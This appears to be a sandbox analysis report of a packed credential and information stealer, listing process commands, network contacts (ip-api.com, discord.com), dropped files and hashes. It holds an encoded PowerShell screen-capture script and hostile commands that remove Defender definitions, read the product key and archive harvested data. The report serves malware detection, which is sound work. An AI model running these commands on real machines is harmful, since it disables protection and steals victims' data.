ACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x4vexh3c\x4vexh3c.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D8F.tmp" "c:\Users\Admin\AppData\Local\Temp\x4vexh3c\CSC505AB3B7C03E44ECBF92EC98A75BE30.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe a -r -hp"n" "C:\Users\Admin\AppData\Local\Temp\8LMCx.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe a -r -hp"n" "C:\Users\Admin\AppData\Local\Temp\8LMCx.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI33762\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

C:\Users\Admin\AppData\Local\Temp\_MEI33762\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/4276-29-0x00007FF840520000-0x00007FF840B09000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI33762\base_library.zip

MD5 32ede00817b1d74ce945dcd1e8505ad0
SHA1 51b5390db339feeed89bffca925896aff49c63fb
SHA256 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512 a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_ctypes.pyd

MD5 00f75daaa7f8a897f2a330e00fad78ac
SHA1 44aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA256 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512 f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

C:\Users\Admin\AppData\Local\Temp\_MEI33762\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_decimal.pyd

MD5 e3fb8bf23d857b1eb860923ccc47baa5
SHA1 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0
SHA256 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3
SHA512 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

C:\Users\Admin\AppData\Local\Temp\_MEI33762\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

C:\Users\Admin\AppData\Local\Temp\_MEI33762\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

C:\Users\Admin\AppData\Local\Temp\_MEI33762\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

C:\Users\Admin\AppData\Local\Temp\_MEI33762\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI33762\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

C:\Users\Admin\AppData\Local\Temp\_MEI33762\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512 b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

C:\Users\Admin\AppData\Local\Temp\_MEI33762\blank.aes

MD5 129d7beafd76a500a2cb82cdf5419137
SHA1 21f4e02cc719af60a74d03b898f92b1a2430b7c1
SHA256 a71db04597f4fd4113d75d6cb8f96d81047e5158f9d5abd7f2f951ad272fd3a1
SHA512 34946fe3bff2fd328437c2bf11cdb026f0d5606d1492a5ae8ef0905276145c0e8fa1ef47fc2774fc52afb63731a2157e5339fcce561384ac1a948bca71d3fc7f

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

memory/4276-36-0x00007FF844D00000-0x00007FF844D0F000-memory.dmp

memory/4276-35-0x00007FF843D10000-0x00007FF843D33000-memory.dmp

memory/4276-58-0x00007FF843CE0000-0x00007FF843D0D000-memory.dmp

memory/4276-60-0x00007FF843CC0000-0x00007FF843CD9000-memory.dmp

memory/4276-64-0x00007FF8403A0000-0x00007FF840517000-memory.dmp

memory/4276-63-0x00007FF843C90000-0x00007FF843CB3000-memory.dmp

memory/4276-66-0x00007FF843C70000-0x00007FF843C89000-memory.dmp

memory/4276-68-0x00007FF844740000-0x00007FF84474D000-memory.dmp

memory/4276-70-0x00007FF843C30000-0x00007FF843C63000-memory.dmp

memory/4276-75-0x00007FF843B60000-0x00007FF843C2D000-memory.dmp

memory/4276-74-0x00007FF840520000-0x00007FF840B09000-memory.dmp

memory/4276-77-0x00000294DE780000-0x00000294DECA0000-memory.dmp

memory/4276-76-0x00007FF83FE80000-0x00007FF8403A0000-memory.dmp

memory/4276-80-0x00007FF843A90000-0x00007FF843AA4000-memory.dmp

memory/4276-79-0x00007FF843D10000-0x00007FF843D33000-memory.dmp

memory/4276-82-0x00007FF843B50000-0x00007FF843B5D000-memory.dmp

memory/4276-84-0x00007FF83FD00000-0x00007FF83FE1C000-memory.dmp

memory/1532-93-0x00007FF82FB83000-0x00007FF82FB84000-memory.dmp

memory/4276-91-0x00007FF843CC0000-0x00007FF843CD9000-memory.dmp

memory/1532-95-0x0000027EE4570000-0x0000027EE4592000-memory.dmp

memory/4148-98-0x00000227BC450000-0x00000227BC4C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5swxshu5.nax.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0028ba9bec2f572910763eabe4a93f95
SHA1 42cd40f41cb73dc17a6c3fb079784045b547e365
SHA256 605aa5910ea90edfe2e91966d28a7505633aed19665f127db755628d92fd048c
SHA512 ec7af8c6caabfc57cf597f90bdbdb9a58adad362e8d9be6e03c4519e82c88b906c6a3b1cd4e1a7c63cbe0e12f90f74af4fcdea82023759e59cc3f2a53fe6cdb5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 cd5b15b46b9fe0d89c2b8d351c303d2a
SHA1 e1d30a8f98585e20c709732c013e926c7078a3c2
SHA256 0a8a0dcbec27e07c8dc9ef31622ac41591871416ccd9146f40d8cc9a2421da7a
SHA512 d7261b2ff89adcdb909b775c6a47b3cd366b7c3f5cbb4f60428e849582c93e14e76d7dcadec79003eef7c9a3059e305d5e4f6b5b912b9ebc3518e06b0d284dd7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0390df3460c1c3e8c8c622ba4d143bae
SHA1 b5018aa9ed59a4b1bc90823b79c509e08f7d8aaf
SHA256 76081ae1b323ab391e0a58cc569b3e39ff17720e7be8a5d5c954a82569232d33
SHA512 4571c166036fd359d6ee6c3423fd1a21c4cb32ec720ed51014c6059451d1030f0be3d396c33bfe3023f360cd8dcaca49a671bc9c3029a2bbddeefd7c1c17e4e8

\??\c:\Users\Admin\AppData\Local\Temp\x4vexh3c\x4vexh3c.cmdline

MD5 cdb0ec6975810290b024276755226627
SHA1 93ef2ac01e5cc557854f8847a049c622c65f7c0b
SHA256 569b47962a91df8bfd2a4f441db401a3ee0adefbd8037812cc3d682cae25ab4b
SHA512 e7ef6a60c0719fa9bc3a7112838800d24bc42b3f7054c8306fea648f6a314f7f4f784d582ac69ae8e9bb43ad5c8a926dc5a21d73681d239bb7b8da4cb316f224

\??\c:\Users\Admin\AppData\Local\Temp\x4vexh3c\x4vexh3c.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\x4vexh3c\CSC505AB3B7C03E44ECBF92EC98A75BE30.TMP

MD5 e6885532046d4b2cb3482fedd18aff86
SHA1 65551193478c3192ad50d304e6cc1bf1a4c396ce
SHA256 654ec01a3fc13096e5f58699065c1df90cca156bcece13270d80e50e63f8a563
SHA512 4a6a032594f2518e3ed06b9c43eadb45eb6da702c09711e29882dfc03e081b68b201069c270c89a2c01e0f85996add300e17826804fb02e8e5ef3059c7ce3ec5

C:\Users\Admin\AppData\Local\Temp\RES6D8F.tmp

MD5 6719280a8b3743bb4b210f197df28958
SHA1 c4204d4808da3d127728f8cf3ca2140b27febb41
SHA256 a7c0951059dddcd1a6dc8460941278d1900bb57d2625a8fcf0a736b316af4990
SHA512 1df9d81b41a6eecae04d2936d53809933540b7e5ccd135c34dd421d746d038bd2fb69bc0a593dd5226c0713f161b6a7bc4dba42b52101a2b9d01533ddde361c2

C:\Users\Admin\AppData\Local\Temp\x4vexh3c\x4vexh3c.dll

MD5 50711d5e4a06e0af681b8df6858dac20
SHA1 8fe2a1ec768c71dd489290741841a5471f1bab0e
SHA256 00c1a3707bf0a551c09cbcd30efb2311f551045f153b6d0d5f7e8e8ecdd15056
SHA512 eba0fd227596140fec2a1d577b9d32209f9dc592344c799024bba51ff46048be6b9ac59ff87cf016dd7e2bf79c5fd7bafb07362ae382b7f2abf1a978a29025af

memory/4036-285-0x0000015F44B50000-0x0000015F44B58000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 57d6e35a75800223cbe126e149aecb51
SHA1 f35b08048b78b9f43285d9d25efbc372336602f5
SHA256 7715e7d4906719c39b58c6752cb0ffdda5d341cafc9980c469d5eb263bc79d87
SHA512 8ae91d0ddb5da9791408867f4efb1eb4af4063a65c200f6cfec54f8fb303a4b58a1aba9c9e42a0fbfd4b4ee9e5b55a62065bd971a2e8f501dc1fa542972c1f39

memory/4276-295-0x00007FF843C90000-0x00007FF843CB3000-memory.dmp

memory/4276-296-0x00007FF8403A0000-0x00007FF840517000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Desktop.txt

MD5 8b7168b4944e2f5feda0090c68e52739
SHA1 64eb37a433ed0660527f8a602e2cdda40409c405
SHA256 5440367e49f5e15b227a5aeffc5517b1422ed6a9bd62e3ce5d31ec0351a80658
SHA512 9255b91d9e476eee6b093d86a83e5b7db9e544a93f131d9751272334c707eca441c640bb26da0a805b7e1b0a0e1172d83bf6fb84350bd39f0e2dbe2724eff4e4

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Documents.txt

MD5 02fd23b22c0d226936c30234eaf5ec33
SHA1 f81933c6938379a23cd8e8a813920947a86f86c9
SHA256 2bda37a42c61027dd9a272170e3e3d20acb3fed775b33c9492f239f5bebcd708
SHA512 326ff7396a39e74a67c7295fca67ff97acd3ff875ddcc953d743728e916923bb2fd1de0b888f1d0af4c8a04a68d70053e606272fa89b0a9eecdf144fcfe1ebed

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Downloads.txt

MD5 432bb2e844e8d2cf433b6c4229d5d622
SHA1 8717497b379052b92df929526312f80a15ad0c2a
SHA256 2d281a12d7765e5e1e6d6730f0157b42d291b493d4157fd59c61a28d5b205539
SHA512 110bdc9006876b8f7f549b8b4282bb1058b2e8a42db21e5cfa09c3f873a674464ee8225cb1cbf7184d15ecb0f392bb9c78412108a9acd400aa27fbe465f5e639

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Music.txt

MD5 c57550453efc90847b1d89a697f617e2
SHA1 8568acd773dffa296dcb3fe460e0e9d534e0f006
SHA256 200ab092ae0f22112966b75a94af6a5617a9b63f75280dec7081ba7d4c55af5f
SHA512 75dc66dcfccde739f713e8216373075ac73c9f46a2c6aef361138f721136504f0159cafef8ebe00990fe79256350fe8096cb46564fe299b8f6ee879f0a95ce98

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Videos.txt

MD5 e140e10b2b43ba6f978bee0aa90afaf7
SHA1 bbbeb7097ffa9c2daa3206b3f212d3614749c620
SHA256 c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618
SHA512 df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Pictures.txt

MD5 aa6063caac7ea4af4febbf7bde57dce1
SHA1 c6f6decc73d161ac22242be29777b909c1cf0c7c
SHA256 9a842b2dd81f26a6e19341315f236578e0cb05ac149d7f285b485ad7a84a1c45
SHA512 73c5f9c654c1813ae691b74a3b3dada810f55c48541872abd4105e18a37e4d266ab4e5a36c07adaad5fefc408677d254e05eb43e9eec0e5120b75ce1436eab4c

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Display (1).png

MD5 057434a969b871dd584d4c55f6b0a290
SHA1 fbdf452552d0aeac3984c70fdd5381f936b4cf70
SHA256 087cfe19f2477aef3898838a0ec3a3415ccee3ae0dc5ad7a8b3079cfdf8ce9ad
SHA512 edd2f7af8567d2675a2ad33501c9f85eda6c6badfe6a52317e91bfc54c6528dc14ecf882b092a275cb1e97446d2bb9dfc24e8c376ad898a8fb4162a804cd6283

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\System\MAC Addresses.txt

MD5 588359aefffbc19c5956e9d30eb2b79d
SHA1 f318fe864199785f4f83ef5d0fb8e67be64b945b
SHA256 9ee763f4e6b107d82b140481ad789f03abae0882c11371f83e2618fbbf1784d4
SHA512 b6a8cf2b96b147df779c90bb3ad9d994fc1faab31d3c06effe4207da3b1e29d6c7ac1f51f7d238d1d2b6ef51f162cc2583d11287a7af19e3b443646c8648c1c7

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\System\System Info.txt

MD5 feb27fbb4e3b306a6ff2544cf070ae00
SHA1 d05417a525bc77d0ffb586b87e2c84990c270c61
SHA256 c1a1b184f0cefc6bdacaa64f599be75d774a0cb56ea7c832bda7bd0291055394
SHA512 f0c1448c6e7af68a54644a09f1ef69499d694e51fc8c3d99157e934c222778503d9cc4138c71d426e8e5dd3d097c8b6ff2fa79e0a398007b213e5c0e781e4b18

